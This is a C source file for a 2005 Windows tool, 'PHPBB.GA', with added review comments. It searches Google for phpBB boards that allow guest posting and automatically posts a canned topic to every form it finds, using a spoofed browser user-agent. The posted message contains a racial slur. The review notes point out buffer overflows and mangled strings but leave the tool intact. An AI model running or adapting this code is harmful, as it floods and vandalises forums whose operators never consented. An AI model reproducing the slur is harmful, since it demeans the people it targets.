文章作者:Dr_aMado
//
// PHPBB.GA
// phpbb.google attack
//
// Create a new topic in all forums
// with guest privileges
//
// by Dr_aMado
// release jan 19 05
//
// triviasecurity.net
//
// NOTE(review): a forum-spam tool. main() pages through Google for phpBB
// boards that let guests post, fetches each hit and POSTs a canned topic to
// every <form> it finds (SearchGoogle -> f_PostToForms -> p_newTopic).
// The per-function notes below point out the unbounded copies that let a
// hostile page or search result crash the tool itself.
//
#include <winsock2.h>
#include <windows.h>
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_G_LINKS 24 // urls to fetch from each google query
#pragma comment(lib, "ws2_32.lib")
// One Google hit: the href scraped from the result list and, once that page
// has been fetched, the ACTION of a <form> found on it. Both are heap strings
// (malloc'd in g_Spider / p_Spider) that main() frees after the post.
typedef struct g_Result
{
char *url; // href text verbatim; f_PostToForms() assumes it starts with "http://"
char *action; // last form action seen on the page; NULL/stale until p_Spider() sets it
} g_Result;
// Result table for one Google result page.
typedef struct sg_Results
{
g_Result urls[MAX_G_LINKS]; // only urls[0..index-1] are valid
int index; // entries filled by g_Spider(); reset to 0 by SearchGoogle()
int start; // Google result page (sent as start=start*10); main() walks it from a random page to 99
} g_Results;
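// Forward declarations, kept in sync with the definitions below.
// The original listing declared addr_connect() with two parameters and
// p_Spider() with a char*, neither of which matched its definition (a hard
// error for a C compiler), and did not declare hasAttribute() at all.
// waitfor() and a_getUrl() are declared but never defined or called.
bool addr_connect(PSOCKADDR_IN ss, SOCKET *socket_a, char *hostname);
char recvBlanks(SOCKET s);
bool hasAttribute(SOCKET s, char *att);
char *getAttVal(SOCKET s, char *b_1024);
bool waitfor(SOCKET s, char c);
void g_Spider(SOCKET s, g_Results *b);
bool p_Spider(SOCKET s, char **a);
bool a_getUrl(SOCKET s, g_Results *b);
bool isTag(SOCKET s, char *h, bool with_attributes);
char *f_PostToForms(g_Result *r);
char *remAmps(char *action);
g_Results *SearchGoogle(char *searchq, g_Results *b);
int forum_from_url(char *url);
void p_newTopic(char *username, char *topic, char *message, int forum_id, char *action, char *host, char *useragent, char *referer);
char *make_action(char *a_512, char *absolute, char *action);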
// action, host, useragent, referer, content-length, post_vars
// Request template filled by p_newTopic(); the form body follows the blank
// line. "Connection: close" matches the fact that the reply is never read.
char HTTP_POST[] = "POST %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\nReferer: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s";
// username, subject, message, f_id
// Form fields of a phpBB-era posting form; mode=newtopic and f=<forum id>
// are presumably what makes the board open a new topic, the bbcode/helpbox
// fields just mimic the real form.
char HTTP_POST_VARS[] = "username=%s&subject=%s&addbbcode18=orange&addbbcode20=12&helpbox=Close+all+open+bbCode+tags&message=%s&mode=newtopic&f=%d&post=Submit";
// Host that is resolved, connected to and sent as Host: by SearchGoogle().
// NOTE(review): the "[url]...[/url]" around the name looks like BBCode added
// by the forum this listing was pasted on, not part of the source:
// gethostbyname() of this exact string fails, and f_PostToForms() compares
// scraped hosts against google+4, which only means "google.com" for the
// literal "www.google.com".
char google[] = "[url]www.google.com[/url]";
// query, start index (page number * 10)
char google_get[] = "/search?q=%s&start=%d";
// URL-encoded query: "post a new topic" "message body" +phpbb — wording that
// appears on boards where the posting form is reachable.
char search[] = "%22post+a+new+topic+%22+%22message+body%22+%2Bphpbb";
// Spoofed browser User-Agent sent with every request.
char agent[] = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
// path, HTTP minor version, host, useragent (every caller passes 0 -> HTTP/1.0)
char get_httpv_host_ua[] = "GET %s HTTP/1.%d\r\nHost: %s\r\nUser-Agent: %s\r\nAccept: */*\r\n\r\n";
char match[] = "<!--m-->"; // **not necessary (unused in this file; presumably a marker in Google's result HTML)
// Message should probably be url-encoded
// Canned topic body, already URL-encoded (CRLF, [b]...[/b], etc.).
char Mado_Msg[] = "%0D%0A%5Bb%5Dgreetings+to+all+my+niggas+at+triviasecurity%5B%2Fb%5D%0D%0AIM+RICK+JAMES%21%21%0D%0A%0D%0A%2DaMado";
// Shared result table: filled by SearchGoogle(), walked and freed by main().
g_Results google_results;
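// Entry point: pick a random Google result page, then for every page from
// there up to 99 fetch the hits and post to each of them. Returns 0 when the
// walk completes (the original returned 1 on the success path) and 1 when
// Winsock could not be initialised.
int main()
{
    // Seeds only the choice of starting page below; nothing cryptographic.
    srand(GetTickCount());
    WSADATA wd;
    if(WSAStartup(MAKEWORD(1,0), &wd) != 0) return 1; // no Winsock -> nothing to do
    // The author assumes Google shows at most 1000 hits (100 pages of 10);
    // starting from a random page spreads repeated runs over the range.
    google_results.start = rand()%100;
    while(google_results.start < 100)
    {
        if(SearchGoogle(search, &google_results) != NULL)
        {
            for(int i=0;i<google_results.index;i++)
            {
                f_PostToForms(&google_results.urls[i]);
                free(google_results.urls[i].url);
                free(google_results.urls[i].action);
                // The slots are reused for the next page and p_Spider() only
                // sets .action when it finds a form: clearing both pointers
                // keeps a stale one from being freed a second time.
                google_results.urls[i].url = NULL;
                google_results.urls[i].action = NULL;
            }
        }
        google_results.start++;
    }
    WSACleanup();
    return 0;
}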
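// Reads s one byte at a time and returns the first non-whitespace byte.
// Returns '\0' when the peer closes the connection or recv() fails; the
// original ignored the recv() result, so a failure left t as the initial
// space and the loop never ended. Callers that loop "until '>'" need to
// treat '\0' as end of stream.
char recvBlanks(SOCKET s)
{
    char t = ' ';
    while(isspace((unsigned char)t))
    {
        if(recv(s, &t, 1, 0) <= 0) return '\0';
    }
    return t;
}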
// Scans the attribute list of the tag being read from s (the caller has just
// consumed the tag name) for an attribute whose uppercased name equals att.
// Returns true with the stream positioned right after that attribute's '=',
// where getAttVal() then reads the value. Returns false once '>' is seen or
// 127 bytes have been collected.
//
// NOTE(review): two defects restrict a match to the FIRST attribute of a tag:
//  - when a name does not match, the '=' that ended it is still stored into
//    the freshly cleared buffer (the fall-through to a[x] below), so every
//    later name starts with '=' and can never equal att;
//  - the value after a non-matching '=' is never skipped, so its bytes are
//    folded into the next name as well.
//  A link such as <a class="x" href="..."> is therefore never picked up.
//  toupper() is applied to a plain (possibly signed) char, and a recv()
//  failure inside recvBlanks() is not visible here.
bool hasAttribute(SOCKET s, char *att)
{
char t = recvBlanks(s);
char a[128];
memset(a, 0, 128);
int x = 0;
while(t != '>' && x < 127)
{
if(t == '=') // end of attribute name
{
a[x] = '\0';
if(strcmp(a, att) ==0)
{
return true;
}else{ // not the attribute we're looking for, find next attribute name
memset(a, 0, 128);
x = 0;
}
}
a[x] = toupper(t); // also runs for the '=' itself (see NOTE above)
t = recvBlanks(s);
x++;
}
return false;
}
// Reads an attribute value from s into b_1024 (1024 bytes) and consumes the
// rest of the tag up to and including '>'. The stream must be just past the
// '=' (as left by hasAttribute()). A value in single or double quotes is
// copied up to the closing quote; otherwise the copy stops at whitespace or
// '>'. At most 1023 bytes are stored. Returns b_1024.
//
// NOTE(review): no terminating NUL is written — both callers zero-fill the
// buffer first, which is what keeps a full 1023-byte value terminated. A
// quoted value longer than 1023 bytes leaves the loop without consuming the
// rest of the tag. The "read until '>'" loops never end if the peer closes
// first, and the recv() results inside the copy loops are unchecked (on
// failure the previous byte is stored again). Entities stay encoded;
// remAmps() later undoes "&amp;" for form actions only.
char *getAttVal(SOCKET s, char *b_1024)
{
char t = recvBlanks(s); // first byte of the value
int x = 0;
char delim;
if(t == '"' || t == '\'')
{
delim = t; // quoted value: copy until the matching quote
while(x < 1023)
{
recv(s, &t, 1, 0); // return value unchecked
if(t != delim)
{
b_1024[x] = t;
x++;
}else
{
// we're done copying, receive till end of tag
while(recvBlanks(s) != '>'); // spins if the connection closes first
break;
}
}
}else
{
for(x = 0; x < 1023 && !isspace(t) && t != '>'; x++) // unquoted: up to whitespace or '>'
{
b_1024[x] = t;
recv(s, &t, 1, 0);
}
if(t != '>')
{
// recv till end of tag
while(recvBlanks(s) != '>');
}
}
return b_1024; // not NUL-terminated here; relies on the caller's zero fill
}
// Checks whether the tag whose '<' the caller just read is named h (names
// are uppercased before comparing, so pass h in upper case). Up to 20 bytes
// of the name are read, stopping at whitespace or '>'. with_attributes
// selects the accepted shape: true requires something other than '>' after
// the name (attributes follow), false requires a bare "<NAME>". Bytes are
// consumed whether or not the name matches, so there is one attempt per '<'.
//
// NOTE(review): a name longer than 20 bytes exits the loop with t still
// inside the name, which counts as "has attributes". Callers treat every '<'
// in the stream as a tag start, so comments and text are fed through too.
bool isTag(SOCKET s, char *h, bool with_attributes)
{
char w[32];
memset(w, 0, 32);
char t = recvBlanks(s); // first byte of the tag name
for(int c=0;c<20 && !isspace(t); c++) // collect the name, uppercased
{
w[c] = (char)toupper(t);
recv(s, &t, 1, 0); // return value unchecked
if(t == '>') break;
}
// if t == '>' that means the tag does not have attributes
bool has_attributes = with_attributes ? (t != '>') : (t == '>'); // true when the tag has the requested shape
return (has_attributes && strcmp(w, h) == 0);
}
// Called by SearchGoogle() for every '<' in the result page. If the tag is
// an <A ...> with an HREF attribute and the table has a free slot, the HREF
// value is copied into a new heap string stored as urls[index].url and
// index is advanced. Anything else is dropped: other tags, links without
// HREF, and links arriving once MAX_G_LINKS slots are full (their value is
// left in the stream, which is simply scanned for the next '<').
//
// NOTE(review): the href is stored verbatim, whatever Google emitted —
// f_PostToForms() later assumes it begins with "http://". malloc() is
// unchecked. main() frees .url.
void g_Spider(SOCKET s, g_Results *b)
{
char url[1024];
memset(url, 0, 1024); // getAttVal() does not NUL-terminate; the zero fill does
if(isTag(s, "A", true))
{
if(hasAttribute(s, "HREF"))
{
if(b->index < MAX_G_LINKS)
{
int len = strlen(getAttVal(s, url));
b->urls[b->index].url = (char*)malloc(len+1);
memset(b->urls[b->index].url, 0, len+1);
strncpy(b->urls[b->index].url, url, len);
b->index++;
}
}
}
// t = space
}
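// Resolves hostname, fills *ss with its first IPv4 address on port 80 and
// connects a fresh TCP socket to it, which is stored in *socket_a.
// Returns false (with *socket_a set to INVALID_SOCKET) when the lookup,
// socket() or connect() fails. The original leaked the descriptor whenever
// connect() failed — one per unreachable scraped host — and did not check
// the socket() result.
bool addr_connect(PSOCKADDR_IN ss, SOCKET *socket_a, char *hostname)
{
    *socket_a = INVALID_SOCKET;
    struct hostent *sHost = gethostbyname(hostname);
    if(sHost == NULL || sHost->h_addr_list[0] == NULL) return false;
    memset(ss, 0, sizeof(*ss));
    ss->sin_family = AF_INET;
    ss->sin_port = htons(80);
    // memcpy instead of a u_long* cast: no alignment or aliasing assumptions.
    memcpy(&ss->sin_addr, sHost->h_addr_list[0], sizeof(ss->sin_addr));
    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sock == INVALID_SOCKET) return false;
    if(connect(sock, (SOCKADDR*)ss, sizeof(SOCKADDR_IN)) != 0)
    {
        closesocket(sock); // don't leak the descriptor on failure
        return false;
    }
    *socket_a = sock;
    return true;
}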
// Called by f_PostToForms() for every '<' in a fetched page. If the tag is a
// <FORM ...> with an ACTION attribute, copies the action into a new heap
// string, stores it in *a and returns true; otherwise returns false and
// leaves *a untouched.
//
// NOTE(review): *a is overwritten without freeing what it held, so a page
// with several forms (search box, login, posting form) leaks every action
// but the last; main() frees only the final pointer. The value is raw HTML
// text — "&amp;" is undone later by remAmps(), other entities are not.
// malloc() is unchecked.
bool p_Spider(SOCKET s, char **a)
{
char p[1024];
memset(p, 0, 1024); // getAttVal() relies on this zero fill for termination
if(isTag(s, "FORM", true))
{
if(hasAttribute(s, "ACTION"))
{
int len = strlen(getAttVal(s, p));
*a = (char*)malloc(len+1);
memset(*a, 0, len+1);
strncpy(*a, p, len);
return true;
}
}
return false;
}
// Fetches one scraped page over HTTP/1.0 and submits the canned "new topic"
// POST to every <form action=...> found in it. r->url is expected to be
// "http://host/path...": the host is cut out for the connection and the
// Host: header, the path is the GET target and the base for resolving
// relative form actions. Hosts matching google+4 are skipped. Returns the
// last form action seen (possibly NULL or stale), or NULL when the host was
// skipped or unreachable; main() ignores the value.
//
// NOTE(review): everything here trusts the scraped URL and the remote page:
//  - r->url+7 assumes a 7-byte "http://" prefix; a relative or shorter href
//    from the results (e.g. "/search?...") makes get point mid-string or
//    past the end of the allocation;
//  - the host copy stops at '/' or 63 bytes but not at NUL, so a URL with no
//    path reads past the string;
//  - sprintf() into req[512] is unbounded while get can be ~1000 bytes
//    (getAttVal() copies up to 1023), so a long result URL overflows the
//    stack buffer — snprintf() with a length check is needed;
//  - google+4 is meant to be "google.com"; with the literal as it appears in
//    this listing (wrapped in [url] BBCode) it is "]www.google.com[/url]"
//    and never matches, so Google's own links are not filtered.
char *f_PostToForms(g_Result *r)
{
// http:// len(7)
SOCKET s;
SOCKADDR_IN a;
int i;
char *get = r->url+7; // skip "http://" (see NOTE above)
char hostname[64];
char req[512];
memset(hostname, 0, 64);
for(i=0;get[i] != '/' && i<63;i++) hostname[i] = get[i]; // host up to the first '/'
get += i; // now the request path
if(strstr(hostname, google+4) != NULL) return NULL; // don't post to Google itself
if(!addr_connect(&a, &s, hostname)) return NULL;
sprintf(req, get_httpv_host_ua, get, 0, hostname, agent); // HTTP/1.0 GET; unbounded (see NOTE)
send(s, req, strlen(req), 0);
while(recv(s, req, 1, 0) > 0) // scan the whole response, headers included, for tags
{
if(req[0] == '<')
{
if(p_Spider(s, &r->action))
{
//POST HERE :POST TO EVERY FORM IN PAGE
memset(req, 0, 512); // req is reused as make_action()'s 512-byte output buffer
p_newTopic("Dr_aMado", "GPHPBB_Poster", Mado_Msg, forum_from_url(r->url), make_action(req, get, remAmps(r->action)), hostname, agent, r->url);
}
}
}
closesocket(s);
return r->action;
}
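// Resolves a form ACTION against the path of the page it was found on and
// writes the result into a_512 (512 bytes, always NUL-terminated).
//   absolute: request path of the fetched page, e.g. "/forum/viewforum.php?f=3"
//   action:   ACTION attribute value, e.g. "posting.php?mode=newtopic&f=3"
// A relative action is appended to the base path up to and including its
// last '/', ignoring any query string ("/viewforum.php?x=a/b" resolves
// against "/"). An action that already starts with '/' is copied as is.
// If the base contains no '/' at all the action is resolved against "/"
// (the original left a_512 untouched in that case). An absolute "http://"
// action is still treated as relative, as before.
// Output that would not fit is truncated; the original used strncpy +
// strncat with a remaining size that went negative (and so became huge)
// for bases longer than 511 bytes. Neither input is modified (the original
// temporarily wrote a NUL into absolute).
char *make_action(char *a_512, char *absolute, char *action)
{
    if(action[0] == '/')
    {
        snprintf(a_512, 512, "%s", action);
        return a_512;
    }
    // Only the path part of the base takes part in resolution.
    const char *query = strchr(absolute, '?');
    size_t path_len = query ? (size_t)(query - absolute) : strlen(absolute);
    // Keep everything up to and including the last '/' of the path.
    size_t base_len = 0;
    for(size_t i = path_len; i > 0; i--)
    {
        if(absolute[i-1] == '/')
        {
            base_len = i;
            break;
        }
    }
    if(base_len == 0)
    {
        snprintf(a_512, 512, "/%s", action);
    }else
    {
        snprintf(a_512, 512, "%.*s%s", (int)base_len, absolute, action);
    }
    return a_512;
}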
// Runs one Google query page and fills b with the links found on it.
// searchq is the already URL-encoded query; b->start selects the result
// page (sent as start=b->start*10). b->index is reset to 0, then g_Spider()
// is invoked for every '<' in the response and appends up to MAX_G_LINKS
// hrefs. Returns b (even with zero hits), or NULL if Google could not be
// resolved or connected to. The request is HTTP/1.0 (the 0 argument) with
// a Host: header and the MSIE User-Agent in `agent`.
//
// NOTE(review): `google` is both the host to resolve and the Host: header;
// as printed in this listing it is wrapped in [url] BBCode, so
// gethostbyname() fails and this always returns NULL. gsearch[128] holds
// the fixed `search` string (about 50 bytes plus the template) but the
// sprintf() is unbounded for any other searchq. Every <a href> on the page
// is taken, Google's own navigation links included; f_PostToForms() tries
// to filter those by hostname.
g_Results *SearchGoogle(char *searchq, g_Results *b)
{
char m[1024];
char gsearch[128];
b->index = 0;
SOCKADDR_IN a;
SOCKET s;
if(!addr_connect(&a, &s, google)) return NULL; // 0,0 :start,http/1.x
sprintf(gsearch, google_get, searchq, b->start*10); // "/search?q=...&start=N"
sprintf(m, get_httpv_host_ua, gsearch, 0, google, agent);
send(s, m, strlen(m), 0);
while(recv(s, m, 1, 0) > 0) // scan the response byte by byte for tags
{
if(m[0] == '<') g_Spider(s, b);
}
closesocket(s);
return b;
}
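// Collapses the HTML entity "&amp;" to a bare "&" in place so a form ACTION
// scraped from HTML can be sent back as a request target. Returns action.
// Only the five-byte entity is touched; a lone '&' is left alone.
//
// The original searched for "&" (not "&amp;") and copied with an overlapping
// strcpy(p+1, p+5): the '&' it kept was found again on every pass, so the
// loop never terminated and each pass read four bytes further past the end
// of the string — an infinite loop plus an out-of-bounds read/write for any
// action containing '&'. memmove() handles the overlap here and the scan
// resumes after the '&' that was kept.
char *remAmps(char *action)
{
    char *p = action;
    while((p = strstr(p, "&amp;")) != NULL)
    {
        memmove(p + 1, p + 5, strlen(p + 5) + 1); // +1 moves the NUL too
        p += 1; // continue after the '&' we kept
    }
    return action;
}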
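// Extracts the forum id from the "f=" query parameter of url
// (".../viewforum.php?f=12&start=50" -> 12). Returns 1 when there is no
// query string or no "f" parameter, the fallback the original used. The
// value is parsed like atoi(): digits up to the first non-digit, 0 when
// there are none. Differences from the original:
//  - the key is matched as a whole, so "?sf=3" or "?ref=5" no longer pass
//    as a forum id (the original used strstr(vars, "f="));
//  - the value is no longer cut to three digits when another parameter
//    follows (the original copied at most 3 bytes into a temporary there);
//  - "&amp;" is accepted as a separator as well as "&", since url is the
//    raw href text stored by g_Spider() and the original's strstr() happened
//    to tolerate it;
//  - url is not modified (the original temporarily wrote a NUL into it).
int forum_from_url(char *url)
{
    char *vars = strchr(url, '?');
    if(vars == NULL) return 1;
    vars++; // skip the '?'
    while(*vars != '\0')
    {
        // vars points at the start of one key=value pair
        if(vars[0] == 'f' && vars[1] == '=')
        {
            return (int)strtol(vars + 2, NULL, 10);
        }
        char *next = strchr(vars, '&');
        if(next == NULL) break;
        vars = next + 1;
        if(strncmp(vars, "amp;", 4) == 0) vars += 4; // href text may still be HTML-encoded
    }
    return 1;
}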
// Builds and sends one posting request: the form fields of HTTP_POST_VARS
// (username, subject, message, mode=newtopic, f=forum_id) wrapped in the
// HTTP_POST template, sent to `action` on `host` with the given User-Agent
// and Referer. Opens its own connection, sends, closes without reading the
// reply, and prints what was posted. Failures are silent except that an
// unreachable host returns early.
//
// NOTE(review): both sprintf() calls are unbounded. POST_VARS is 512 bytes
// and POST is 1024, while action (up to 511 bytes from make_action()) and
// referer (the scraped URL, up to 1023 bytes) are controlled by the remote
// page; once action+referer exceed a few hundred bytes the request line,
// headers and body no longer fit and POST overflows on the stack. Use
// snprintf() and abort the post on truncation. The "[url]" text in the
// printf format looks like forum BBCode pasted around this listing rather
// than part of the original source.
void p_newTopic(char *username, char *topic, char *message, int forum_id, char *action, char *host, char *useragent, char *referer)
{
char POST_VARS[512];
char POST[1024];
memset(POST_VARS, 0, 512);
memset(POST, 0, 1024);
sprintf(POST_VARS, HTTP_POST_VARS, username, topic, message, forum_id); // unbounded (see NOTE)
sprintf(POST, HTTP_POST, action, host, useragent, referer, strlen(POST_VARS), POST_VARS); // unbounded (see NOTE)
//printf("%s\n", POST);
SOCKET a;
SOCKADDR_IN b;
if(!addr_connect(&b, &a, host)) return;
send(a, POST, strlen(POST), 0);
closesocket(a); // reply is never read
printf("Posted to: [url]http://%s%s[/url]\n\tReferer:%s\n\tForum_id:%i\n\n", host, action, referer, forum_id);
return;
}